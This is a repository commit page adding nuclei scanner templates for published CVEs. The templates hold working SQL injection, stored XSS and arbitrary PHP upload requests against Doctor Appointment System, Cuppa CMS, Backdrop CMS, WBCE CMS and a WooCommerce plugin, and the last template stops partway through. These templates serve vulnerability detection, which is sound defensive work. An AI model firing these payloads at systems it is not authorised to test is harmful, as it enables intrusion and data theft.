daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #7183 from projectdiscovery/cve-templates1 

CVE templates added
patch-1
Dhiyaneshwaran 2023-05-10 01:09:21 +05:30 committed by GitHub
parent 95d0deb055 68b0734657
commit 68828dd492
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
21 changed files with 1278 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
http/cves/2021/CVE-2021-27314.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27314
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-27314
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system
http:
- raw:
- |
@timeout: 10s
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Doctor Appoinment System")'
condition: and

38
http/cves/2021/CVE-2021-27315.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27315
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27315
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27315
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and

38
http/cves/2021/CVE-2021-27316.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27316
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27316
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27316
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and

38
http/cves/2021/CVE-2021-27319.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27319
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27319
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27319
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and

38
http/cves/2021/CVE-2021-27320.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27320
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27320
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and

57
http/cves/2022/CVE-2022-24264.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2022-24264
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24264
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24264
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
variables:
num: '999999999'
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
search_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{md5(num)}}'
- 'td_available_languages'
condition: and
- type: word
part: header_2
words:
- "text/html"
- type: status
status:
- 200

46
http/cves/2022/CVE-2022-24265.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-24265
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24265
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24265
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /components/menu/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "menu/html/edit.php")'
condition: and

46
http/cves/2022/CVE-2022-24266.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-24266
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24266
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24266
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
order_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "list_admin_table")'
condition: and

46
http/cves/2022/CVE-2022-27984.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-27984
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-27984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-27984
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /templates/default/html/windows/right.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "components/menu/classes/functions.php")'
condition: and

55
http/cves/2022/CVE-2022-27985.yaml Normal file
View File

@ -0,0 +1,55 @@
id: CVE-2022-27985
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-27985
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-27985
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
variables:
num: '999999999'
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /alerts/alertLightbox.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

80
http/cves/2022/CVE-2022-42095.yaml Normal file
View File

@ -0,0 +1,80 @@
id: CVE-2022-42095
info:
name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42095
- https://nvd.nist.gov/vuln/detail/CVE-2022-42095
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42095
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,cms,backdrop,authenticated
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/page HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/page HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save
- |
POST /?q={{randstr}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- "status_code_5 == 200"
- "contains(all_headers_5, 'text/html')"
- 'contains(body_5, "<img src=\"x\" onerror=\"alert(document.domain)\" />")'
- "contains(body_5, 'Backdrop CMS')"
condition: and
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: form_token
group: 1
regex:
- 'name="form_token" value="(.*)"'
internal: true

185
http/cves/2022/CVE-2022-42096.yaml Normal file
View File

@ -0,0 +1,185 @@
id: CVE-2022-42096
info:
name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42096
- https://nvd.nist.gov/vuln/detail/CVE-2022-42096
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42096
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,cms,backdrop,authenticated
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/post HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/post HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="title"
{{randstr}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_tags[und]"
{{randstr}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][summary]"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][value]"
<img src=x onerror=alert(document.domain)>
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][format]"
full_html
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_image[und][0][fid]"
0
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_image[und][0][display]"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="changed"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_build_id"
{{form_id_1}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_token"
{{form_token}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_id"
{{form_id_2}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="scheduled[date]"
2023-04-25
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="scheduled[time]"
16:59:23
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="promote"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="name"
{{name}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="date[date]"
2023-04-24
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="date[time]"
16:59:23
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="path[auto]"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="comment"
2
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="additional_settings__active_tab"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="op"
Save
------WebKitFormBoundaryIubltUxssi0yqDjp--
- |
GET /?q=posts/{{randstr}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src="x" onerror="alert(document.domain)" />'
- 'Backdrop CMS'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: name
group: 1
regex:
- 'name="name" value="(.*?)"'
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- 'name="form_id" value="(.*)"'
internal: true
- type: regex
name: form_token
group: 1
regex:
- 'name="form_token" value="(.*)"'
internal: true

56
http/cves/2022/CVE-2022-4328.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2022-4328
info:
name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
remediation: Fixed in version 18.0
reference:
- https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
- https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4328
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4328
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2022,rce,wordpress,wp-plugin,wp,n-media-woocommerce-checkout-fields
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597
--------------------------22728be7b3104597
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
<?php echo md5("CVE-2022-4328"); ?>
--------------------------22728be7b3104597--
- |
GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "fe5df26ce4ca0056ffae8854469c282f"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

100
http/cves/2022/CVE-2022-45037.yaml Normal file
View File

@ -0,0 +1,100 @@
id: CVE-2022-45037
info:
name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://shimo.im/docs/dPkpKPQEjXfvYoqO/read
- https://nvd.nist.gov/vuln/detail/CVE-2022-45037
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-45037
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
formtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
- |
GET /admin/users/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- "<script>alert(document.domain)</script>"
- "SESSION_TIMEOUT"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: username_fieldname_2
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true

100
http/cves/2022/CVE-2022-45038.yaml Normal file
View File

@ -0,0 +1,100 @@
id: CVE-2022-45038
info:
name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://shimo.im/docs/Ee32MrJd80iEwyA2/read
- https://nvd.nist.gov/vuln/detail/CVE-2022-45038
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-45038
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/settings/ HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/settings/save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
advanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=
- |
GET /search/index.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "Results For"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: app_name
part: body
group: 1
regex:
- 'name="app_name" value="(.*?)"'
internal: true

131
http/cves/2022/CVE-2022-46020.yaml Normal file
View File

@ -0,0 +1,131 @@
id: CVE-2022-46020
info:
name: WBCE CMS v1.5.4 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-46020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46020
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2022,rce,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/settings/index.php?advanced=yes HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/settings/save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
- |
POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="reqid"
test
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="cmd"
upload
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="target"
l1_Lw
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
Content-Type: application/x-php
